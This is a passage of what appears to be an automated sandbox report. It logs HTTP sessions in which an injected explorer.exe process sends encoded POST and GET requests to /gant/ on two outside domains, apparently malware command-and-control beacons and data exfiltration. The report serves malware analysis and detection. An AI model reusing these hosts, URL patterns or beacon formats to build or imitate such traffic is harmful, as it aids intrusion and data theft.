                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.performingartshub.co.uk
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.performingartshub.co.uk/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 5a 50 6c 34 65 72 71 5a 4f 74 47 37 49 32 4b 50 5a 54 58 73 4b 63 55 6d 6b 65 47 34 6f 62 51 32 4d 7a 73 67 6d 75 6f 64 59 46 56 4d 69 35 42 67 7e 6b 31 7a 46 37 73 5f 50 46 47 6e 6e 6b 68 45 55 51 72 37 5a 36 55 58 58 66 42 71 45 63 55 37 7a 41 6c 43 67 4c 36 64 34 4b 68 2d 42 74 6b 4f 77 53 76 68 68 33 55 72 62 61 70 72 7a 73 50 4b 36 5f 73 64 76 45 46 73 64 4f 63 52 6a 2d 53 39 38 47 49 31 39 65 28 34 54 4a 66 59 79 55 6c 56 62 44 79 2d 4f 6d 75 4a 46 73 59 59 6c 35 71 6d 4a 30 6b 48 72 53 64 6a 68 42 44 48 66 6c 54 5f 44 39 28 72 37 52 4a 74 41 57 36 72 43 44 33 50 77 71 56 59 67 73 36 5f 4f 52 41 34 32 6f 63 52 31 58 45 48 43 79 55 42 4f 4d 6e 66 43 53 35 30 72 66 68 4d 4b 46 4b 34 63 6c 55 77 39 42 46 70 28 4d 70 35 54 69 5a 64 41 33 57 64 43 6c 6b 6a 56 65 71 57 56 51 30 4d 47 30 76 55 71 76 43 75 69 63 73 76 4d 58 51 76 4e 42 70 31 75 58 56 50 78 5f 4a 50 6f 73 39 58 37 33 31 34 54 39 38 47 4e 6e 6e 6a 62 63 76 32 66 45 63 49 51 44 4f 59 64 51 77 45 71 4b 36 30 67 52 63 34 51 42 4a 33 41 41 72 4f 70 44 70 6b 39 33 66 6a 42 6e 6d 6b 63 65 36 46 78 69 33 7a 77 32 51 6e 30 77 55 62 33 6d 64 31 62 7a 4e 73 6d 6f 33 41 54 54 6b 58 4c 54 6d 6d 79 4d 74 35 78 2d 79 44 6d 74 67 74 4e 69 47 57 7a 41 76 49 58 72 62 75 4a 69 69 63 6e 63 4c 31 66 55 46 30 6a 6e 5a 57 41 4e 61 5a 71 63 4f 5f 78 68 72 74 39 5f 76 4f 35 57 38 56 50 65 47 55 52 75 50 46 72 74 54 55 75 71 48 5a 28 55 5a 55 70 67 31 5a 57 4d 35 47 34 49 31 4a 35 66 6a 55 31 62 46 75 31 48 7a 6b 47 4f 43 68 4b 75 67 43 74 64 30 77 42 72 70 68 78 79 28 46 5a 74 36 54 4b 5f 31 54 49 43 79 4f 34 6d 63 7a 7a 71 65 79 4a 6a 55 33 28 32 77 74 38 66 6e 57 43 6e 58 54 57 56 72 57 54 72 56 4e 50 4c 49 59 6c 34 69 7a 28 6b 51 50 43 66 28 31 76 4a 46 4f 73 43 74 32 6c 33 78 56 54 39 66 4a 58 63 64 36 4c 71 61 58 52 67 6c 63 72 43 66 32 50 73 37 58 28 4f 65 38 35 73 46 51 7e 4d 6b 31 33 4b 66 79 58 56 42 4d 75 59 35 4d 74 52 41 6b 4d 71 4a 57 6d 4b 4d 62 33 6b 69 30 77 66 6f 4f 47 61 46 45 58 76 54 76 56 64 34 53 68 47 32 31 79 62 72 55 44 6a 41 62 4f 66 43 55 41 67 69 48 6c 5a 76 79 56 4c 30 50 68 7a 34 67 4b 79 4f 57 41 36 38 72 79 48 37 36 4d 64 58 59 71 6f 37 4a 75 75 33 33 44 75 64 6e 72 4e 55 5f 37 36 4c 42 49 39 48 52 46 79 41 59 47 43 67 32 32 61 52 72 28 43 74 67 42 43 76 39 61 38 35 65 5a 66 31 50 73 6e 4f 47 55 46 69 53 44 51 57 38 57 53 57 54 4b 77 7a 4e 44 38 28 73 54 34 49 46 43 54 64 4c 65 46 28 38 75 37 67 72 62 4f 5a 52 48 70 78 75 28 36 59 47 69 59 6b 59 65 4b 70 45 45 38 49 6c 49 6b 58 58 79 4d 73 6a 58 61 4a 4f 79 6e 6a 30 73 50 28 71 4c 47 78 63
                                                                                                                  Data Ascii: j-Jh9P=ZPl4erqZOtG7I2KPZTXsKcUmkeG4obQ2MzsgmuodYFVMi5Bg~k1zF7s_PFGnnkhEUQr7Z6UXXfBqEcU7zAlCgL6d4Kh-BtkOwSvhh3UrbaprzsPK6_sdvEFsdOcRj-S98GI19e(4TJfYyUlVbDy-OmuJFsYYl5qmJ0kHrSdjhBDHflT_D9(r7RJtAW6rCD3PwqVYgs6_ORA42ocR1XEHCyUBOMnfCS50rfhMKFK4clUw9BFp(Mp5TiZdA3WdClkjVeqWVQ0MG0vUqvCuicsvMXQvNBp1uXVPx_JPos9X7314T98GNnnjbcv2fEcIQDOYdQwEqK60gRc4QBJ3AArOpDpk93fjBnmkce6Fxi3zw2Qn0wUb3md1bzNsmo3ATTkXLTmmyMt5x-yDmtgtNiGWzAvIXrbuJiicncL1fUF0jnZWANaZqcO_xhrt9_vO5W8VPeGURuPFrtTUuqHZ(UZUpg1ZWM5G4I1J5fjU1bFu1HzkGOChKugCtd0wBrphxy(FZt6TK_1TICyO4mczzqeyJjU3(2wt8fnWCnXTWVrWTrVNPLIYl4iz(kQPCf(1vJFOsCt2l3xVT9fJXcd6LqaXRglcrCf2Ps7X(Oe85sFQ~Mk13KfyXVBMuY5MtRAkMqJWmKMb3ki0wfoOGaFEXvTvVd4ShG21ybrUDjAbOfCUAgiHlZvyVL0Phz4gKyOWA68ryH76MdXYqo7Juu33DudnrNU_76LBI9HRFyAYGCg22aRr(CtgBCv9a85eZf1PsnOGUFiSDQW8WSWTKwzND8(sT4IFCTdLeF(8u7grbOZRHpxu(6YGiYkYeKpEE8IlIkXXyMsjXaJOynj0sP(qLGxc
                                                                                                                  Feb 13, 2023 19:01:35.258897066 CET855OUTData Raw: 36 77 49 4d 68 52 79 34 6e 4c 58 32 4b 44 67 48 70 52 6c 79 78 4c 47 7a 51 67 4f 74 63 65 79 66 77 45 4e 33 4c 59 6f 4e 64 75 35 4f 34 49 7e 64 31 39 78 72 75 70 75 55 30 50 5a 31 34 6f 7e 6e 33 4b 45 59 4d 78 30 31 34 39 6c 31 56 61 76 6c 48 6d
                                                                                                                  Data Ascii: 6wIMhRy4nLX2KDgHpRlyxLGzQgOtceyfwEN3LYoNdu5O4I~d19xrupuU0PZ14o~n3KEYMx0149l1VavlHm~F8vjozZolcl9wF2o6lMekkhKj(bjiUKwr1i(gfghpbSkCn9ROljX57Ynb6Owwsw0yytITUNgtqxmJpQwP0X08XcpDzQzrUqZKSUuABshl5gehTJPLWwH2pqn7g42AzLrDJB1_re3_MkSiuWnBn-VOrF~nP53LFzC
                                                                                                                  Feb 13, 2023 19:01:35.258946896 CET861OUTData Raw: 36 6d 77 6b 46 69 64 34 6d 57 39 6d 43 30 74 70 33 53 28 58 75 67 57 32 4a 43 44 39 6c 2d 4c 6b 75 72 61 65 75 35 39 78 61 75 33 67 32 46 7a 6e 49 4a 34 7a 62 66 66 52 58 56 41 54 59 62 35 66 54 44 6d 6f 4c 54 35 74 31 6d 78 54 50 6b 46 37 7a 76
                                                                                                                  Data Ascii: 6mwkFid4mW9mC0tp3S(XugW2JCD9l-Lkuraeu59xau3g2FznIJ4zbffRXVATYb5fTDmoLT5t1mxTPkF7zvV0sAaQOTaHgZiG(MUt3ZOKER~OwOVqu2DY(d9E8zGSOZEFu485VIOOyJ1ZpcnWbjMCcV8tAjYujmNd0enMD7UH2HUHY4xjw9wnC7n6mRMEaPdYyDtl(A~aLdW0MkmlSK6fIla4pUU4JbT-18~bA5nFhhZa~pUHMGf
                                                                                                                  Feb 13, 2023 19:01:35.273781061 CET867OUTData Raw: 54 44 48 32 34 72 67 71 7a 41 39 4a 6d 38 70 6e 42 6c 64 79 74 6d 6c 5a 61 4f 61 51 63 79 56 68 77 78 69 78 76 65 59 4a 42 61 4e 5a 58 66 67 73 4d 46 71 6d 72 36 68 31 7e 46 76 5f 51 57 31 38 55 56 50 6e 34 61 77 69 70 37 53 56 4b 47 46 37 7e 68
                                                                                                                  Data Ascii: TDH24rgqzA9Jm8pnBldytmlZaOaQcyVhwxixveYJBaNZXfgsMFqmr6h1~Fv_QW18UVPn4awip7SVKGF7~hOCdvvxD9as3AQfFEpkOjMcsM35dRX1rOxjgidA(v57QDKRRycLmggMaGOkNaoo4AuPD1dLXt(8ukVMpibT6m3orCy_cdNCqhd-9yV-dxLsSGOUUTecPakK2-ssVqxhC4X9JkbnTN2jdsDZZ1hl53HfIhEYPfGzkeQ
                                                                                                                  Feb 13, 2023 19:01:35.273930073 CET883OUTData Raw: 39 33 35 51 7a 6a 75 4e 31 33 28 2d 6d 4f 71 70 32 4d 76 4b 75 6c 4c 64 6c 64 4c 77 67 79 30 45 64 7a 54 6f 54 62 74 6e 31 55 75 59 61 6e 6d 69 67 42 6e 74 68 46 4c 70 39 48 30 67 71 4d 5a 51 71 38 75 51 7e 5f 44 36 7a 67 77 6b 67 51 49 36 70 5a
                                                                                                                  Data Ascii: 935QzjuN13(-mOqp2MvKulLdldLwgy0EdzToTbtn1UuYanmigBnthFLp9H0gqMZQq8uQ~_D6zgwkgQI6pZDnLpiK2T5UmAJ3MNPnXJg34Y1bE25508RgqC2qQPg83mE4iWl20fF1aB3DAmch3hKERpWL0HsDobnDREUE7G0MAn0N(WYfYm10fqYCMnkIRRG8yG~5lS4j1C(b8KVNTEnhamaHLibsv9aH6t6ikSIO(jYPJAVa41H
                                                                                                                  Feb 13, 2023 19:01:35.274060011 CET887OUTData Raw: 6d 62 53 34 46 45 5a 6e 51 2d 32 68 35 6e 45 51 41 4c 6c 2d 49 53 64 5f 77 49 71 64 68 32 59 5a 61 72 72 72 6e 71 61 77 74 4f 4f 47 75 33 69 67 35 37 73 63 76 44 6c 67 69 43 49 64 51 65 50 54 4d 59 45 72 53 76 69 53 5a 41 59 4f 4a 45 45 78 41 78
                                                                                                                  Data Ascii: mbS4FEZnQ-2h5nEQALl-ISd_wIqdh2YZarrrnqawtOOGu3ig57scvDlgiCIdQePTMYErSviSZAYOJEExAx(5UUGE9rtx5tAaRT0x(j~isjJN4VonjY7IuTw0nV~IhwB8cxMbLuEMqmFNfgIvjE4rUoAkjsdnA9wmlFUh124nTerFQqqlvW2pAAFIp-6jGUSWWz97DGZu0Zx3zyYk7qb2MgpaewdfVdk6(T9NyoefkY2fRWnew1R
                                                                                                                  Feb 13, 2023 19:01:35.288520098 CET890OUTData Raw: 70 71 6e 56 72 41 38 53 30 45 28 77 61 69 67 67 47 73 63 6d 57 50 39 79 4a 73 78 50 64 46 45 68 70 54 28 32 52 36 79 39 65 71 6e 4d 34 75 4d 6f 6a 48 6c 6d 52 57 30 71 53 4f 67 61 4a 4f 6d 36 44 32 6d 58 76 39 75 79 52 70 47 78 6e 56 47 5a 56 50
                                                                                                                  Data Ascii: pqnVrA8S0E(waiggGscmWP9yJsxPdFEhpT(2R6y9eqnM4uMojHlmRW0qSOgaJOm6D2mXv9uyRpGxnVGZVPb8j89tOSwduG7osaJ5GE(5GsphSpOSfTijmoOn2eL3Bd2brgg10HE0(2LkS8Sw3xMRb4sOsGqiO5vUhrvniNV5UW3pzPnUIhjrD9vXCLYMduZVknioDPzcBK7vussGOL5gzgiqBRIPieLpYqGH4zTeSQ5MqT7xSnf
                                                                                                                  Feb 13, 2023 19:01:35.288670063 CET901OUTData Raw: 67 30 72 78 4b 56 7e 7a 6d 64 6e 55 47 41 32 73 72 34 7e 5a 37 55 65 6a 54 57 76 73 69 54 43 43 58 73 76 37 4d 71 52 33 38 77 79 5a 4d 4f 28 4d 43 77 28 6f 38 56 6a 71 37 71 36 5f 7a 69 58 78 55 55 48 53 67 6b 69 6a 39 43 44 36 30 66 63 5a 74 32
                                                                                                                  Data Ascii: g0rxKV~zmdnUGA2sr4~Z7UejTWvsiTCCXsv7MqR38wyZMO(MCw(o8Vjq7q6_ziXxUUHSgkij9CD60fcZt2KrLOG6WlTEdpQ688PGThRMnbqHXuSVevy7kEH-oHhpou(Yp3qNd5wpqWK18zFU4wuxsnveYYCd9ILHnFbduh6hfp(zE22YFSqIjkh6sjz4aGKZAxW6(5QzY6ue0K2YzuNLUWhmoZW7ToD1BpXFLcYWAcKaXXYTCiL
                                                                                                                  Feb 13, 2023 19:01:35.308608055 CET902INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:01:35 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  26192.168.11.2049870217.160.0.6480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:37.803877115 CET903OUTGET /gant/?j-Jh9P=UNNYdcSQH8G7azuEeyjHGvIpwoKghrgSH3Udh5NSOmta1bwA4yZMM4UvAxe/iGptPmuGT4M6JuNJB68yuzE0hMzX7pwOCu8H8A==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.performingartshub.co.uk
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:01:37.826659918 CET903INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 626
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:01:37 GMT
                                                                                                                  Server: Apache
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  27192.168.11.2049871208.91.197.9180C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:43.260858059 CET905OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.brothersbears.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.brothersbears.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.brothersbears.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 4b 69 71 33 32 45 69 47 35 33 74 79 51 4e 61 51 6d 41 53 4b 7e 31 7a 63 4d 73 61 6e 33 36 66 67 45 58 6a 72 43 61 67 77 28 75 6e 45 30 57 79 55 75 41 35 65 68 2d 52 77 51 6c 54 37 66 34 37 69 64 5a 56 76 71 39 32 54 55 46 52 52 44 6e 74 78 48 59 70 63 50 37 45 30 54 4e 28 4e 46 6a 65 4a 49 65 52 48 47 7a 6f 45 54 63 51 6f 6f 61 7a 45 57 2d 63 53 28 58 76 44 42 52 69 43 4d 58 6b 51 70 71 71 6f 66 51 42 37 65 67 4c 59 4c 62 42 58 5a 72 67 50 6e 77 4a 61 35 58 75 61 6a 6b 6e 75 28 7a 42 56 7a 78 69 36 72 67 7a 74 73 30 53 59 69 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=Kiq32EiG53tyQNaQmASK~1zcMsan36fgEXjrCagw(unE0WyUuA5eh-RwQlT7f47idZVvq92TUFRRDntxHYpcP7E0TN(NFjeJIeRHGzoETcQooazEW-cS(XvDBRiCMXkQpqqofQB7egLYLbBXZrgPnwJa5Xuajknu(zBVzxi6rgzts0SYiw).


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  28192.168.11.2049872208.91.197.9180C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:45.882019043 CET906OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.brothersbears.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.brothersbears.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.brothersbears.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 4b 69 71 33 32 45 69 47 35 33 74 79 51 73 71 51 31 6a 71 4b 76 46 7a 62 44 4d 61 6e 75 4b 66 6b 45 58 76 72 43 59 4e 33 71 4d 7a 45 30 30 71 55 74 42 35 65 67 2d 52 77 62 46 54 69 41 49 37 54 64 5a 51 50 71 34 32 54 55 46 56 52 4d 31 6c 78 42 6f 70 66 62 4c 45 33 55 4e 28 49 55 54 66 6e 49 65 4e 39 47 79 38 45 51 73 38 6f 36 73 48 45 63 4e 45 52 79 58 76 42 51 42 69 42 43 33 6b 61 70 71 57 52 66 52 70 52 65 51 7a 59 4b 36 68 58 61 72 67 49 74 41 49 7a 68 58 76 66 6f 6d 4b 35 77 7a 35 32 68 6a 75 5a 30 44 32 5a 6d 58 6a 41 67 57 34 39 6f 57 6e 43 54 6c 67 4a 71 41 43 61 4d 71 41 6d 79 30 63 48 7e 66 6e 47 48 68 5a 31 4f 79 70 6c 53 59 76 74 74 42 50 4c 62 4a 32 59 45 4f 31 44 61 57 6e 2d 52 52 79 30 6f 71 35 79 4f 52 4a 48 56 66 45 4b 35 67 45 39 62 74 4c 65 6d 35 36 77 28 39 70 70 64 65 74 52 68 42 6b 78 44 71 74 6e 69 49 44 39 39 43 68 5f 44 70 61 7a 48 4b 66 47 66 74 32 46 71 56 53 4e 49 39 32 6d 50 78 67 37 79 7a 57 37 4b 43 77 64 37 37 45 79 28 42 36 57 6c 47 63 72 4d 70 55 44 4a 74 64 76 51 65 37 54 34 48 6f 6a 65 73 4c 64 50 59 4b 49 41 67 33 45 54 57 4c 68 69 4b 28 74 41 4c 4b 70 79 69 72 4e 35 68 30 79 6e 48 45 4a 43 69 4d 75 36 2d 75 2d 35 41 39 4c 4d 37 47 64 5a 6b 33 62 37 55 49 35 48 74 5a 79 52 56 72 73 64 4a 6c 38 79 64 4c 61 7a 64 73 67 54 54 6f 63 36 59 74 43 61 54 68 74 6e 65 62 49 75 57 65 54 32 61 4d 49 65 6a 4b 34 66 47 58 45 65 67 6e 72 4f 70 41 64 42 5a 5a 35 46 5f 72 6d 56 52 33 52 38 37 67 5f 32 53 62 39 30 78 50 4a 78 41 65 32 72 6f 37 33 7a 4f 67 32 7e 77 5a 4d 4c 42 56 65 76 2d 72 54 49 2d 35 51 70 31 41 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=Kiq32EiG53tyQsqQ1jqKvFzbDManuKfkEXvrCYN3qMzE00qUtB5eg-RwbFTiAI7TdZQPq42TUFVRM1lxBopfbLE3UN(IUTfnIeN9Gy8EQs8o6sHEcNERyXvBQBiBC3kapqWRfRpReQzYK6hXargItAIzhXvfomK5wz52hjuZ0D2ZmXjAgW49oWnCTlgJqACaMqAmy0cH~fnGHhZ1OyplSYvttBPLbJ2YEO1DaWn-RRy0oq5yORJHVfEK5gE9btLem56w(9ppdetRhBkxDqtniID99Ch_DpazHKfGft2FqVSNI92mPxg7yzW7KCwd77Ey(B6WlGcrMpUDJtdvQe7T4HojesLdPYKIAg3ETWLhiK(tALKpyirN5h0ynHEJCiMu6-u-5A9LM7GdZk3b7UI5HtZyRVrsdJl8ydLazdsgTToc6YtCaThtnebIuWeT2aMIejK4fGXEegnrOpAdBZZ5F_rmVR3R87g_2Sb90xPJxAe2ro73zOg2~wZMLBVev-rTI-5Qp1A.


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  29192.168.11.2049873208.91.197.9180C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:48.507832050 CET910OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.brothersbears.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.brothersbears.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.brothersbears.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 4b 69 71 33 32 45 69 47 35 33 74 79 51 73 71 51 31 6a 71 4b 76 46 7a 62 44 4d 61 6e 75 4b 66 6b 45 58 76 72 43 59 4e 33 71 4e 4c 45 7a 48 69 55 76 69 52 65 6d 4f 52 77 46 31 54 6e 41 49 37 30 64 64 45 44 71 34 79 70 55 48 64 52 4d 69 70 78 42 61 42 66 4c 37 45 4d 4b 64 28 4b 46 6a 66 4b 49 65 52 68 47 79 6f 2d 54 63 49 6f 6f 62 44 45 57 64 34 53 71 58 76 44 51 42 69 7a 49 58 6c 70 70 71 53 61 66 52 6c 52 65 54 4c 59 4b 49 5a 58 5a 38 55 49 75 67 49 79 6f 33 76 75 7a 32 4b 32 77 7a 74 49 68 6a 75 6e 30 43 43 5a 6d 51 66 41 79 42 6b 38 6d 57 6e 43 62 46 67 4f 39 52 28 64 4d 73 6b 41 79 30 34 48 7e 64 33 47 48 42 5a 31 59 7a 70 6d 56 34 75 6d 67 68 50 63 4d 35 4b 41 45 4b 6b 30 61 57 44 2d 53 68 32 30 70 62 35 79 4a 77 4a 48 4c 76 45 49 39 67 45 71 52 4e 4c 72 6d 35 71 57 28 2d 68 44 64 59 74 52 68 68 45 78 56 66 42 6b 71 49 44 5f 7a 69 68 51 55 5a 65 76 48 4c 76 73 66 74 32 56 71 55 57 4e 4a 4d 47 6d 4f 77 67 6b 78 6a 57 77 44 69 77 79 78 62 41 34 28 41 53 65 6c 47 56 32 4d 76 30 44 4b 4e 64 76 42 4e 54 51 79 33 6f 34 57 4d 4c 50 4c 59 4b 54 41 67 37 6d 54 58 50 78 6a 35 4c 74 43 37 61 70 31 79 72 4f 72 52 30 75 7e 58 45 48 47 69 4d 75 36 2d 71 4d 35 41 78 4c 4d 4a 57 64 66 43 48 62 7e 48 51 35 46 74 5a 77 52 56 72 39 64 4a 70 31 79 64 53 51 7a 64 64 46 54 56 49 63 36 4a 39 43 66 53 68 75 72 4f 62 42 34 6d 65 36 79 61 42 58 65 69 69 67 66 47 47 35 5a 53 7a 72 50 74 6b 64 46 5a 5a 2d 4f 5f 72 62 66 78 33 48 34 37 73 64 32 57 37 48 30 31 4f 43 78 43 65 32 6f 65 4f 65 6d 66 55 54 6b 47 51 6e 4d 41 68 4e 74 4f 37 39 58 63 30 54 36 52 78 79 45 6b 54 53 6c 6f 7e 30 75 71 47 56 76 30 67 58 5a 57 4a 6b 6f 4f 6c 5a 61 70 44 6b 69 35 5a 55 76 39 34 38 69 4a 4f 58 46 5a 75 75 47 62 42 5a 4d 48 4f 74 62 73 6d 64 68 59 74 6d 7e 30 70 44 56 6c 54 72 72 51 6a 38 68 39 28 69 74 34 34 74 67 57 53 77 73 78 75 70 35 74 49 6d 31 59 6a 5a 48 4f 69 6e 6a 64 6a 78 68 6c 